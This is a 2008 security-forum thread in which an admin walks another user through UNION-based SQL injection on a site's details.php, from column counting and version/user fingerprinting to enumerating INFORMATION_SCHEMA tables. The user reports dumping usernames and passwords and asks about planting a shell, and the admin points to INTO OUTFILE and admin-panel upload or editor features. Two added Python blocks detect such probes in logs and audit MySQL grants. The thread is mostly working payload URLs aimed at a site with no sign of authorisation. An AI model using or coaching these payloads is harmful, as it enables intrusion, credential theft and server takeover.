IT Security and Insecurity Portal |
|
|
how do i go forward ? |
|
Posted: Tue Feb 19, 2008 9:45 pm |
|
|
theface |
Active user |
|
|
Joined: Dec 24, 2007 |
Posts: 33 |
|
ok i have found a bug in this
http://www.site.com/details.php?id=-1'
Code: | You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' && publish = '1' ORDER BY id DESC LIMIT 0, 100' at line 1 |
how do i get to admin area using this ? ? |
|
Posted: Tue Feb 19, 2008 10:06 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
Step by step.
First, you don't need single quotes here:
Code: |
http://www.site.com/details.php?id=-1+OR
|
... and you will get error message.
Next:
Code: |
http://www.site.com/details.php?id=-1--+
|
no error message?
Now try this:
Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1--+
|
Got error message? About wrong columns count? |
|
Posted: Tue Feb 19, 2008 10:12 pm |
|
|
theface |
Active user |
|
|
Joined: Dec 24, 2007 |
Posts: 33 |
|
yeah it's going exactly the way you told. but how do i get the admin login ? |
|
Posted: Tue Feb 19, 2008 10:24 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
theface wrote: | yeah it's going exactly the way you told. but how do i get the admin login ? |
Where is your patience
Try this:
Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2--+
|
Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3--+
|
Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5--+
|
Now repeat UNION tests with increased column count, till you get no errors or the error message is different. At that moment you will know the needed column count. Post it here. |
|
Posted: Tue Feb 19, 2008 10:44 pm |
|
|
theface |
Active user |
|
|
Joined: Dec 24, 2007 |
Posts: 33 |
|
Code: | http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6--+ |
i am getting a blank page with
|
Posted: Tue Feb 19, 2008 11:07 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
Next:
Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,@@version,6--+
|
Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,USER(),6--+
|
Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,DATABASE(),6--+
|
Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,COUNT(*),6+FROM+mysql.user--+
|
Post here mysql version. And let me know, if "Access denied" appears in last test. |
|
Posted: Tue Feb 19, 2008 11:13 pm |
|
|
theface |
Active user |
|
|
Joined: Dec 24, 2007 |
Posts: 33 |
|
Version 5.0.45
Code: | SELECT command denied to user 's4ngUCMs88'@'*6*****' for table 'user' |
|
Posted: Tue Feb 19, 2008 11:39 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
This is mysql version 5.x, so you can use INFORMATION_SCHEMA database for insider look.
Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,TABLE_NAME,6+FROM+INFORMATION_SCHEMA.TABLES--+
|
Do you see one table name entry or multiple?
If it's only one entry, then use LIMIT:
Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,COUNT(TABLE_NAME),6+FROM+INFORMATION_SCHEMA.TABLES--+
|
... will give you count of all table names
Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,TABLE_NAME,6+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1--+
|
Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,TABLE_NAME,6+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1--+
|
Code: |
http://www.site.com/details.php?id=-1+UNION+ALL+SELECT+1,2,3,4,TABLE_NAME,6+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+20,1--+
|
Look for interesting table names - user, admin, people, accounts, staff, logins, etc ... |
|
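From the defender's side, the request sequence in the posts above leaves a recognisable trail in the web server's access log. The following is an added example, not code from the forum or its members: it assumes a combined-format access log and that `id` is a parameter the application expects to be an integer, and the log lines and client addresses are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3}')
NUMERIC_PARAMS = {"id"}  # assumption: parameters the application expects to be integers
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\s+(.*?)(?:\s+from\b|--|#|$)", re.I | re.S)
# Most specific stage first; the first pattern that matches names the request.
STAGES = [("schema_enum", re.compile(r"information_schema", re.I)),
          ("fingerprint", re.compile(r"@@version|\b(?:user|database)\s*\(\s*\)|mysql\.user", re.I)),
          ("union_probe", UNION_RE)]

def classify(value):
    """Return (stage, union_column_count) for one URL-decoded parameter value."""
    if re.fullmatch(r"-?\d+", value.strip()):
        return None, None                    # well-formed integer: nothing to report
    m = UNION_RE.search(value)
    cols = len(m.group(1).split(",")) if m else None  # naive: commas inside calls also count
    for stage, rx in STAGES:
        if rx.search(value):
            return stage, cols
    return "syntax_probe", cols              # other non-integer input: stray quote, bare comment

def analyse(lines, min_stages=3):
    """Group suspicious requests per client and flag staged enumeration."""
    seen = defaultdict(lambda: {"stages": set(), "columns": set()})
    for m in filter(None, map(LOG_RE.match, lines)):
        client, target = m.groups()
        for name, value in parse_qsl(urlsplit(target).query):
            stage, cols = classify(value) if name in NUMERIC_PARAMS else (None, None)
            if stage:
                seen[client]["stages"].add(stage)
                if cols:
                    seen[client]["columns"].add(cols)
    return {c: {"stages": sorted(d["stages"]), "columns": sorted(d["columns"]),
                "alert": len(d["stages"]) >= min_stages or len(d["columns"]) >= 3}
            for c, d in seen.items()}

# Constructed sample log: the request sequence from the thread, plus one normal request.
PROBES = ["-1%27", "-1+UNION+ALL+SELECT+1--+", "-1+UNION+ALL+SELECT+1,2,3--+",
          "-1+UNION+ALL+SELECT+1,2,3,4,5,6--+", "-1+UNION+ALL+SELECT+1,2,3,4,@@version,6--+",
          "-1+UNION+ALL+SELECT+1,2,3,4,TABLE_NAME,6+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+1,1--+"]
SAMPLE = [f'203.0.113.7 - - [19/Feb/2008:22:00:00 +0000] "GET /details.php?id={p} HTTP/1.1" 200 512'
          for p in PROBES]
SAMPLE.append('198.51.100.20 - - [19/Feb/2008:22:01:00 +0000] "GET /details.php?id=42 HTTP/1.1" 200 8120')

if __name__ == "__main__":
    print(analyse(SAMPLE))
```

A growing set of distinct UNION column counts from one client is the most reliable signal here, because ordinary traffic never varies the shape of a numeric parameter that way.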
Posted: Tue Feb 19, 2008 11:57 pm |
|
|
theface |
Active user |
|
|
Joined: Dec 24, 2007 |
Posts: 33 |
|
ok i have got the tables and users and its passes as well
is there anyway i can inject a shell ? |
|
Posted: Wed Feb 20, 2008 10:46 am |
|
|
theface |
Active user |
|
|
Joined: Dec 24, 2007 |
Posts: 33 |
|
any help about the Shell injection waraxe? |
|
Posted: Wed Feb 20, 2008 10:56 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
theface wrote: | ok i have got the tables and users and its passes as well
is there anyway i can inject a shell ? |
Only direct way from Mysql database to file system is INTO OUTFILE. And it works only if currently logged in Mysql user has FILE privileges. Probably you don't have FILE privs. So you must find other methods to get php code execution level access.
Is there admin interface? Did you get admin credentials? Can you log in as admin? Admin interface MAY contain insecure functionality, which can be used for php code injection. Example - template or file editors, file uploads, ... |
|
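Two points in this thread come down to database account privileges: the earlier "SELECT command denied ... for table 'user'" error, and the FILE privilege that INTO OUTFILE depends on. The following is an added example, not code from the forum, that audits `SHOW GRANTS` output for exactly those two conditions; the account names and grant lines are constructed.

```python
import re

GRANT_RE = re.compile(r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+"
                      r"(?P<account>'[^']*'@'[^']*')", re.I)
ALL = {"ALL", "ALL PRIVILEGES"}

def audit_grants(grant_lines):
    """Map each account to the risky findings in its SHOW GRANTS output."""
    findings = {}
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if not m:
            continue
        # Drop column lists such as SELECT (a, b) before splitting the privilege list.
        privs = {p.strip().upper() for p in re.sub(r"\([^)]*\)", "", m["privs"]).split(",")}
        scope = m["scope"].replace("`", "").lower()
        hits = set()
        if scope == "*.*" and privs & (ALL | {"FILE"}):
            hits.add("FILE")               # INTO OUTFILE needs this global privilege
        if privs & (ALL | {"SELECT"}) and (scope == "*.*" or scope.startswith("mysql.")):
            hits.add("MYSQL_SCHEMA_READ")  # can read mysql.user, the server's account table
        if hits:
            findings.setdefault(m["account"], set()).update(hits)
    return {acct: sorted(h) for acct, h in findings.items()}

# Constructed SHOW GRANTS output for three hypothetical accounts.
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO 'webapp'@'localhost'",
    "GRANT SELECT ON `shop`.* TO 'webapp'@'localhost'",
    "GRANT SELECT, FILE ON *.* TO 'legacy'@'%'",
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
]

if __name__ == "__main__":
    print(audit_grants(SAMPLE_GRANTS))
```

An account scoped like the constructed `webapp` one produces no findings, which is the state the web application's database user should be in.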
Posted: Wed Feb 20, 2008 11:02 am |
|
|
theface |
Active user |
|
|
Joined: Dec 24, 2007 |
Posts: 33 |
|
i am unable to login to admin as i am unable to find the login page |
|
Posted: Wed Feb 20, 2008 1:01 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
All times are GMT